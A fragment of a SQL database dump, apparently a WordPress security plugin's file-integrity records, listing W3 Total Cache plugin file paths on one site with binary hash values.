1L,Xv','jk͝*MZ<*7\'','',0,'?'),('%SMxxM^0','wp-content/plugins/w3-total-cache/PageSpeed_Data.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/PageSpeed_Data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%%ܠC&F','=\Z| AwƗkHB\rz3Ƌ','',0,'?'),('}|sKF̊c','wp-content/plugins/w3-total-cache/PageSpeed_Instructions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/PageSpeed_Instructions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hm!c$Y̨2)G','%/\rP`$βэ]&_boӽ','',0,'?'),('i\0Ϡ<:s','wp-content/plugins/w3-total-cache/PageSpeed_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/PageSpeed_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0r @|','v4HgE<','',0,'?'),('Bz3bg\'LJ\r%I','wp-content/plugins/w3-total-cache/PageSpeed_Page_View.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/PageSpeed_Page_View.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z,*n&/','^<\\#ytGldMq@4l;','',0,'?'),('[ƮMzf+','wp-content/plugins/w3-total-cache/PageSpeed_Page_View.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/PageSpeed_Page_View.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' zqZة4',' r?w{I`','',0,'?'),('6 25nZ','wp-content/plugins/w3-total-cache/PageSpeed_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/PageSpeed_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n\"v;@L ','l7:Yn`+F4OHӰ_:\\&wyDJ','',0,'?'),('A: \rPDlc','wp-content/plugins/w3-total-cache/PageSpeed_Page_View_FromAPI.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/PageSpeed_Page_View_FromAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r?n','`ZP\r :+x6zXaFK','',0,'?'),('UDoS5Gƒ_R','wp-content/plugins/w3-total-cache/PageSpeed_Widget_View.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/PageSpeed_Widget_View.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aʾAXSnw','F|7o/7ι%m50\\U3sZQ','',0,'?'),('Aiz)+','wp-content/plugins/w3-total-cache/PageSpeed_Widget_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/PageSpeed_Widget_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yc9%ZxK_&','tM-\'ٮQ\'~ ~0fv*l','',0,'?'),('qq*6ZtT','wp-content/plugins/w3-total-cache/PageSpeed_Widget_View_FromApi.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/PageSpeed_Widget_View_FromApi.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6\\ sr',')6\\-6BfcQ$?U1 ]&','',0,'?'),('Vʙ<%*`','wp-content/plugins/w3-total-cache/PgCache_ConfigLabels.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/PgCache_ConfigLabels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bq\\AhkU','ȰFyOsi֐J/!_ g%%\\','',0,'?'),('M=ϔ\\ڈ n<','wp-content/plugins/w3-total-cache/PgCache_ContentGrabber.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/PgCache_ContentGrabber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\'j#z? ','Z>hv z|0(]A{','',0,'?'),('g\' HE','wp-content/plugins/w3-total-cache/PgCache_Environment.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/PgCache_Environment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 穬>HL!','\"~)=ap \n_=Q2X_','',0,'?'),('s$svW;','wp-content/plugins/w3-total-cache/Root_AdminActivation.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Root_AdminActivation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wU͙Atiݛ','\\Q?T@t7&aԶH','',0,'?'),('6ND%a3M','wp-content/plugins/w3-total-cache/Root_AdminMenu.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Root_AdminMenu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z4:/)F+2','mDSQ*r-kd$aS\'mk2','',0,'?'),('.J 90_>\\yg','wp-content/plugins/w3-total-cache/Root_Environment.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Root_Environment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K \ZCD<\rFӺ','%`{Ẩ4/r`3•eǓP','',0,'?'),('eFre\\@','wp-content/plugins/w3-total-cache/Root_Loader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Root_Loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|afiݱO\Zx',' pG)Js}Sת \\)','',0,'?'),('Q1P2 \"B','wp-content/plugins/w3-total-cache/SetupGuide_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/SetupGuide_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z.b ','KZ2۝PZ9>9,','wp-content/plugins/w3-total-cache/Support_Page_View_PageContent.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Support_Page_View_PageContent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(s8vA8\r','aV ĐHp!Tә1r','',0,'?'),('T6Hh#\ruk','wp-content/plugins/w3-total-cache/SystemOpCache_AdminActions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/SystemOpCache_AdminActions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' )b[iܼC','AIx;;#{Ow3s.W8;t','',0,'?'),('Sg_dyPs','wp-content/plugins/w3-total-cache/SystemOpCache_Core.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/SystemOpCache_Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#-E,Y(R','^Ղ]daFLtƀK؞}','',0,'?'),('ޭa89aIM','wp-content/plugins/w3-total-cache/SystemOpCache_GeneralPage_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/SystemOpCache_GeneralPage_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':Z􆙍:Ksqj','wUuu4M*q\0','wp-content/plugins/w3-total-cache/UsageStatistics_Page_DbRequests_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Page_DbRequests_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','۸wf&!=e','\nH_\'b0Z0cKK7:ƑA d-','',0,'?'),(',? 8R, ','wp-content/plugins/w3-total-cache/UsageStatistics_Page_ObjectCacheLog_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Page_ObjectCacheLog_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z.?(Y ΃J','`{aܱSz~P/ fi]|\\g','',0,'?'),('rLrV#Զ9t','wp-content/plugins/w3-total-cache/UsageStatistics_Page_PageCacheRequests_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Page_PageCacheRequests_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UOD|d','h:A/\"rm|*M^ZM~q','',0,'?'),('rwC:O75*,a','wp-content/plugins/w3-total-cache/UsageStatistics_Page_View.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Page_View.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':M}σ','K(ۛcoem{0u6','',0,'?'),('7^R+\nl\n[m|g','',0,'?'),('q>Z*z@U(','wp-content/plugins/w3-total-cache/UsageStatistics_Plugin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5a','G8\rZ]QW\\(s ','',0,'?'),('KُQ6ݓ','wp-content/plugins/w3-total-cache/UsageStatistics_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8LX]Tښ ','U׵0w8KA\r0\00N|֤O`','',0,'?'),(',PT(]o4P57v','wp-content/plugins/w3-total-cache/UsageStatistics_Source_AccessLog.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Source_AccessLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q\newV]PZ ','KS i*H}\\$w+.','',0,'?'),('F\")!m ','wp-content/plugins/w3-total-cache/UsageStatistics_Source_DbQueriesLog.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Source_DbQueriesLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lrw }*;','ʧvR\ZoIɌ\\kkhdgw2P/,;8M','',0,'?'),(' nAuor_!7','wp-content/plugins/w3-total-cache/UsageStatistics_Source_ObjectCacheLog.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Source_ObjectCacheLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vQz~LҬL@','p^6ZMOyqԅj%>eH','',0,'?'),('5C/ \n=!l','wp-content/plugins/w3-total-cache/UsageStatistics_Source_PageCacheLog.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Source_PageCacheLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DAM^3n#X','9$goiy~t0UE0pDxi^&','',0,'?'),('Waл\0','wp-content/plugins/w3-total-cache/UsageStatistics_Source_Wpdb.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Source_Wpdb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8r\'+n',' pXvxEqE4YJ*?9l I2','',0,'?'),('%E\rtKJoE','wp-content/plugins/w3-total-cache/UsageStatistics_Sources.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Sources.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qdVðsl2','\00`_&Su\"b.[w-@','',0,'?'),('0+|i[{+','wp-content/plugins/w3-total-cache/UsageStatistics_Sources_Apc.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Sources_Apc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`{+PƄ R,e','JJ[y/6E_j2s2m}#WS','',0,'?'),('oUNE]M\0x','wp-content/plugins/w3-total-cache/UsageStatistics_Sources_Memcached.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Sources_Memcached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yž,','`HPmPʥoY,}sg','',0,'?'),('2m@ah8 e','wp-content/plugins/w3-total-cache/UsageStatistics_Sources_Redis.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Sources_Redis.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Or Y','1_}=0o8{8iu,:u','',0,'?'),('`7ZFʮ','wp-content/plugins/w3-total-cache/UsageStatistics_StorageReader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_StorageReader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z\'ʞ}CNz1','KNWĄa -yCuL: N','',0,'?'),(']7Gsl?E','wp-content/plugins/w3-total-cache/UsageStatistics_StorageWriter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_StorageWriter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','--Ch(KCv`','i;kwB+Zպe^','',0,'?'),('#[HצU%','wp-content/plugins/w3-total-cache/UsageStatistics_Widget.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E/Ӱڈ','DZDH6Zyٔ;Yvi','',0,'?'),(']\n\'pFP9{ ','wp-content/plugins/w3-total-cache/UsageStatistics_Widget_View.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Widget_View.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cޠUeU','c:}m)x~DK>A','',0,'?'),('jxLY\\~\'h','wp-content/plugins/w3-total-cache/UsageStatistics_Widget_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Widget_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fΡǾ!|\n3','^(1e=͎\'qm㲎rt','',0,'?'),('rU_awp','wp-content/plugins/w3-total-cache/UsageStatistics_Widget_View_Disabled.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UsageStatistics_Widget_View_Disabled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s,@BuY\"y','n+؍H.*qi\"S禸9Ḙ','',0,'?'),('wif׌l','wp-content/plugins/w3-total-cache/UserExperience_DeferScripts_Extension.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UserExperience_DeferScripts_Extension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_Cǜ','AgQHTM=00pLW','',0,'?'),('UWDM>','wp-content/plugins/w3-total-cache/UserExperience_DeferScripts_Mutator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UserExperience_DeferScripts_Mutator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QZAD-','\"6Vٗ ЁFG)XI(P⥦ ','',0,'?'),('VrFIĞH0ӕ','wp-content/plugins/w3-total-cache/UserExperience_DeferScripts_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UserExperience_DeferScripts_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oXYU]3)N',')I󝣬Rر-k\\\njy˽','',0,'?'),('E5BrrY-2','wp-content/plugins/w3-total-cache/UserExperience_DeferScripts_Script.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UserExperience_DeferScripts_Script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h= T9rN','?%wQx0-D@)!yի@Ȩ\"','',0,'?'),('mS','wp-content/plugins/w3-total-cache/UserExperience_Emoji_Extension.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UserExperience_Emoji_Extension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.`s$ȱk\0','ud,4U͗K+.TJsgA','',0,'?'),('SL-y1́\r','wp-content/plugins/w3-total-cache/UserExperience_GeneralPage.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UserExperience_GeneralPage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k6a=,','ɛi #mq1/좠W','',0,'?'),('A}pp','wp-content/plugins/w3-total-cache/UserExperience_GeneralPage_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UserExperience_GeneralPage_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 47N0 jns','RUL 7RC{ceAWZN','',0,'?'),('\0TA/Zqxj~','wp-content/plugins/w3-total-cache/UserExperience_LazyLoad_GoogleMaps_GoogleMapsEasy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UserExperience_LazyLoad_GoogleMaps_GoogleMapsEasy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VUP$h:$','n9yeţaLeo/\rܨbK','wp-content/plugins/w3-total-cache/UserExperience_LazyLoad_Mutator_Unmutable.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UserExperience_LazyLoad_Mutator_Unmutable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6Q䚵Uc4 ','9`>a!LȜPu\\`','',0,'?'),('^. $,މ','wp-content/plugins/w3-total-cache/UserExperience_LazyLoad_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UserExperience_LazyLoad_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Frmfύx','3EK}Bӌ$?','',0,'?'),('TS%K@^]','wp-content/plugins/w3-total-cache/UserExperience_LazyLoad_Plugin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UserExperience_LazyLoad_Plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}Ϊ\nϒc>','z}X(WH8tYM[;XpN,%','',0,'?'),(']l l\Z\"1& ','wp-content/plugins/w3-total-cache/UserExperience_OEmbed_Extension.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UserExperience_OEmbed_Extension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^%~(զA\Z','ӎ]㚱,<\nzkj','wp-content/plugins/w3-total-cache/UserExperience_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UserExperience_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5|S]M','ZQGUhTB(\0Ǝ}R','',0,'?'),('ю!sci 27','wp-content/plugins/w3-total-cache/UserExperience_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UserExperience_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R֪5eC07','sO+\0mca\"ߎYv+<','',0,'?'),('&޾kIKہ+X','wp-content/plugins/w3-total-cache/UserExperience_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UserExperience_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q݁\rV0U1m','%1גR\'҃ .,hS','',0,'?'),('9ۡ}޻<\rq]','wp-content/plugins/w3-total-cache/UserExperience_Plugin_Jquery.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/UserExperience_Plugin_Jquery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8p<<-w9','O_k&9TlIiG=\0Ue','',0,'?'),(':ih}wM','wp-content/plugins/w3-total-cache/Util_Activation.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_Activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{J','_\'(Ļi]MyF&ϢHz\0e','',0,'?'),('!,HB3@','wp-content/plugins/w3-total-cache/Util_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"7}&g1>#K8+','\rۢ^[鹉|HN+]~\'T{A','',0,'?'),('J{GOeVq','wp-content/plugins/w3-total-cache/Util_AttachToActions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_AttachToActions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S鬖eX\r=','=[WZaA]!Y5j֒, R-','',0,'?'),('uTJW \0n ','wp-content/plugins/w3-total-cache/Util_Bus.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_Bus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^س&H|txWb','ۭO)j7GE]ٟWց+%QW3','',0,'?'),('n{^u)^','wp-content/plugins/w3-total-cache/Util_ConfigLabel.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_ConfigLabel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N\"oumV=','Wie- 8\rk8!\"^DY5R','',0,'?'),('\\iɛdXK','wp-content/plugins/w3-total-cache/Util_Content.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_Content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+9-z%','Vu-yQ\nC^','',0,'?'),('0l]&R','wp-content/plugins/w3-total-cache/Util_Debug.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_Debug.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<-i5WKBJ','K(fH.{ۛk+ơ*v@=','',0,'?'),('A\rۡ~$gi','wp-content/plugins/w3-total-cache/Util_DebugPurgeLog_Reader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_DebugPurgeLog_Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',&.x%_~Fu','!N*%؉]r7li`/}팼 ','',0,'?'),('0 \r BMe~','wp-content/plugins/w3-total-cache/Util_Environment.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_Environment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MPk\"=_lm','D3Y`L~:ExOʟrc','',0,'?'),('\ZN8nDx>)','wp-content/plugins/w3-total-cache/Util_Environment_Exception.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_Environment_Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{\\,\';XG?','vdM_%D{gr}3\n9\"','',0,'?'),('ex5Νufa0\\o','wp-content/plugins/w3-total-cache/Util_Environment_Exceptions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_Environment_Exceptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-PUHM9dv@','7_H!D0K=;\\\ZtD^.','',0,'?'),('%\ngB*','wp-content/plugins/w3-total-cache/Util_File.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ް\\׫6[DI',')l߄ul^9T]c\Z5 7^q','',0,'?'),('&)(HД\n-BQ!','wp-content/plugins/w3-total-cache/Util_Http.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_Http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q6[o\rz`J,','y:_Dz˕!ײ\'M/','',0,'?'),('!*i`v!kY5ij','wp-content/plugins/w3-total-cache/Util_Installed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_Installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y|GxnC0-',' ֡c\\Q\0*Uz8e I=ZEjp','',0,'?'),(' Cv̽BUq}>','wp-content/plugins/w3-total-cache/Util_Mime.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_Mime.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VQC?0=s^?','MIL\ZT̀}Ϫu@v#w/@','',0,'?'),('ఱҩU)CZ','wp-content/plugins/w3-total-cache/Util_PageSpeed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_PageSpeed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','…$;>Q8Pm)','<1\'R0En~\rxI','',0,'?'),('0vL=\"9','wp-content/plugins/w3-total-cache/Util_PageUrls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_PageUrls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I/C.','Ě\0Ic?s\'^K','',0,'?'),('[zrkn\0','wp-content/plugins/w3-total-cache/Util_Request.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_Request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d$V@-{l<',',5F Lo *x4 D\\','',0,'?'),('o[5Q2p','wp-content/plugins/w3-total-cache/Util_Rule.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_Rule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˺G@Y\rg>UĘ\'?','x]Ei<~sIykGcZDՠz]IC','',0,'?'),('9 =B^E','wp-content/plugins/w3-total-cache/Util_Theme.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_Theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=PtW?sG|','OifP{2L4!z#','',0,'?'),('Vlw:Df','wp-content/plugins/w3-total-cache/Util_Ui.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_Ui.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ċ*շE','f}2\"\r\'XB\r>Cֹ&J\r%','',0,'?'),('Wk݋Lė4','wp-content/plugins/w3-total-cache/Util_UsageStatistics.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_UsageStatistics.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4dCY%(','k=XqVjNЍ\0&','',0,'?'),('A2szS^','wp-content/plugins/w3-total-cache/Util_Widget.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_Widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KEn 2xe',']2Wd&G~y*zxZ1;R Ũ','',0,'?'),('KC aٸ#X','wp-content/plugins/w3-total-cache/Util_WpFile.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_WpFile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[b߸AݧSbH','P2JtHs;14-\0','',0,'?'),('6޺)8[dd{0l','wp-content/plugins/w3-total-cache/Util_WpFile_FilesystemChmodException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_WpFile_FilesystemChmodException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J<¢wDC%L','Gsh+C#\'116s2','',0,'?'),('yӻuC ','wp-content/plugins/w3-total-cache/Util_WpFile_FilesystemRmException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_WpFile_FilesystemRmException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0-t)','h5ZS+c0͙尝W#jPjm','',0,'?'),('ȴ3_9','wp-content/plugins/w3-total-cache/Util_WpFile_FilesystemRmdirException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_WpFile_FilesystemRmdirException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[rP@j%','Aw0#1a\' @neE=y/','',0,'?'),('wViKmӥ=[','wp-content/plugins/w3-total-cache/Util_WpFile_FilesystemWriteException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_WpFile_FilesystemWriteException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[6+%vHI','>Ul08V6y\0C2k )','',0,'?'),('gJ+','wp-content/plugins/w3-total-cache/Util_WpmuBlogmap.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Util_WpmuBlogmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.Xh\0','Ѩ+\Z?*~<1oK5G\"wh!h','',0,'?'),(' NC;AQS','wp-content/plugins/w3-total-cache/Varnish_Flush.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Varnish_Flush.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ycnZj_','0Iqpo/v\0=B^','',0,'?'),('oU\\ ZA3','wp-content/plugins/w3-total-cache/Varnish_Plugin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Varnish_Plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z{y񺳖\r','-]-V?>`[Dc4Dh%b','',0,'?'),('̄^!+_\"6\Z','wp-content/plugins/w3-total-cache/extension-example/Extension_Example.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/extension-example/Extension_Example.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F{@17av','EyT/a+GeS͒ 